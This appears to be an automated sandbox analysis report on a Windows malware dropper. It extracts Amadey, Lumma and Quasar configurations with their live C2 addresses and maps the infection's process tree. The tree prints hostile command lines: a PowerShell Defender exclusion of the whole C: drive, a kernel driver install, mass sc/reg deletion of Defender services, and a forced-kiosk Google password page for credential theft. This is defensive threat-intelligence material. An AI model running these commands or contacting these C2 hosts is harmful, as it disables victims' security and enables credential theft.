Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
02/04/2025, 09:02
General
-
Target
file.exe
-
Size
4.1MB
-
MD5
a515a66a168e9ef511c34abf945f1ff4
-
SHA1
e63bc3328a8ea75b6616c8ec4b286bbdec943525
-
SHA256
45c7ff8e9ea76d1c1d91bb4b6f9ca3ad9dbb2707122c32e68d1d199d5beb189e
-
SHA512
cc254c9ccd24b4c8017c0172c8d57a7d23d15fd7120e44c8fe7e84df4527f88d2ff8cfda5481d5eccadf0ba066b1d6bad2cbac1f2be3ac2ad2c123949af279e3
-
SSDEEP
98304:X+2tteQQlmhqbZYtUbi+tQMcWptpmhtmfuxCi:X+xQgmEbZY65QMt3pmhoGCi
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://radvennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://orodformi.run/aUosoz
https://advennture.top/GKsiio
https://6targett.top/dsANGt
https://hcosmosyf.top/GOsznj
https://hywnnavstarx.shop/FoaJSi
https://1ironloxp.live/aksdd
https://vspacedbv.world/EKdlsk
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Gcleaner family
-
Healer
Healer an antivirus disabler dropper.
-
Healer family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
-
Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
-
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
-
Modifies security service 2 TTPs 2 IoCs
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 18 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
-
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Deletes itself 1 IoCs
-
Drops startup file 2 IoCs
-
Executes dropped EXE 32 IoCs
-
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Modifies file permissions 1 TTPs 2 IoCs
-
Reads ssh keys stored on the system 2 TTPs
Tries to access SSH used by SSH programs.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Enumerates processes with tasklist 1 TTPs 19 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Windows directory 14 IoCs
-
Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
-
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 49 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 26 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 44 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 2 IoCs
-
NTFS ADS 1 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 33 IoCs
-
Suspicious use of SendNotifyMessage 26 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G4l05.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G4l05.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q30C9.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q30C9.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\10416730101\bc88724d49.exe"C:\Users\Admin\AppData\Local\Temp\10416730101\bc88724d49.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10416730101\bc88724d49.exe"6⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416740101\8aeabaeb04.exe"C:\Users\Admin\AppData\Local\Temp\10416740101\8aeabaeb04.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10416750101\9506ae8b5d.exe"C:\Users\Admin\AppData\Local\Temp\10416750101\9506ae8b5d.exe"5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10416760101\1b810f9f50.exe"C:\Users\Admin\AppData\Local\Temp\10416760101\1b810f9f50.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2052 -prefsLen 27099 -prefMapHandle 2056 -prefMapSize 270279 -ipcHandle 2128 -initialChannelId {3455ea92-1e9b-4072-acaf-206f1f6dbcc1} -parentPid 4040 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4040" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu8⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2516 -prefsLen 27135 -prefMapHandle 2520 -prefMapSize 270279 -ipcHandle 2528 -initialChannelId {014777ab-8f35-43ea-8240-9d8da2bba9c6} -parentPid 4040 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4040" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket8⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3948 -prefsLen 25213 -prefMapHandle 3952 -prefMapSize 270279 -jsInitHandle 3956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3964 -initialChannelId {b8071bf2-6f82-4700-8576-d9829bd9dc10} -parentPid 4040 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4040" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab8⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4112 -prefsLen 27325 -prefMapHandle 4116 -prefMapSize 270279 -ipcHandle 4184 -initialChannelId {a273345b-a678-49f8-be85-3de27d0dd874} -parentPid 4040 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4040" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd8⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3308 -prefsLen 34824 -prefMapHandle 2824 -prefMapSize 270279 -jsInitHandle 3140 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3136 -initialChannelId {363623ab-2657-4037-ad86-9b07951f0cda} -parentPid 4040 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4040" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab8⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5008 -prefsLen 35012 -prefMapHandle 5012 -prefMapSize 270279 -ipcHandle 5020 -initialChannelId {7b6478bc-b6a9-46ba-9bea-525d0583c69a} -parentPid 4040 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4040" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility8⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4992 -prefsLen 32952 -prefMapHandle 5324 -prefMapSize 270279 -jsInitHandle 5260 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5340 -initialChannelId {fed5b03b-e9a0-4414-95d2-9462d1f2ecfd} -parentPid 4040 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4040" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab8⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5512 -prefsLen 32952 -prefMapHandle 5516 -prefMapSize 270279 -jsInitHandle 5520 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5528 -initialChannelId {d7996aa8-0bf8-4ab7-ab3d-50a09cb8f136} -parentPid 4040 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4040" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab8⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5704 -prefsLen 32952 -prefMapHandle 5708 -prefMapSize 270279 -jsInitHandle 5712 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5720 -initialChannelId {4d2026f2-54e4-4f32-8b46-9d6d3f48b46a} -parentPid 4040 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4040" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab8⤵
- Checks processor information in registry
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416770101\78be77dd11.exe"C:\Users\Admin\AppData\Local\Temp\10416770101\78be77dd11.exe"5⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\10416780101\5ad6941730.exe"C:\Users\Admin\AppData\Local\Temp\10416780101\5ad6941730.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416790101\ad690422d5.exe"C:\Users\Admin\AppData\Local\Temp\10416790101\ad690422d5.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe"C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe"C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"6⤵
- Downloads MZ/PE file
- Adds Run key to start application
-
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""7⤵
- Deletes itself
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C1E4.tmp\C1E5.tmp\C1E6.bat C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go8⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C2CE.tmp\C2CF.tmp\C2D0.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"9⤵
-
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver10⤵
- Launches sc.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 110⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\sc.exesc stop ddrver10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver10⤵
- Launches sc.exe
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "Sense"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "Sense"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f10⤵
- Modifies security service
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"10⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f10⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f10⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f10⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f10⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f10⤵
-
-
C:\Windows\system32\sc.exesc stop ddrver10⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete ddrver10⤵
- Launches sc.exe
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416850101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10416850101\TbV75ZR.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 6487⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10416861121\5ym0ZYg.cmd"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10416861121\5ym0ZYg.cmd"6⤵
- System Location Discovery: System Language Discovery
-
